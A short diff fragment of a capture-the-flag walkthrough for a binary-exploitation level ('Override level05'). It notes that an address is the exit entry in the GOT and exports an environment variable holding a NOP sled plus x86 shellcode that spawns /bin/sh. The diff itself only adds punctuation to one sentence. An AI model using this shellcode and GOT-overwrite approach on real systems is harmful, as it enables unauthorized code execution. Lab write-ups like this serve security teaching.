selfsigned/HackThePlanet/Override/level05/walkthrough.md

 ```
 `0x80497e0` is `exit` in the GOT

-But this time we don't just have a function to call, what are we gonna do!
+But this time we don't just have a function to call, what are we gonna do!?
 ```shell
 export PWN=$(python -c 'print "\x90"*500 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"')
 ```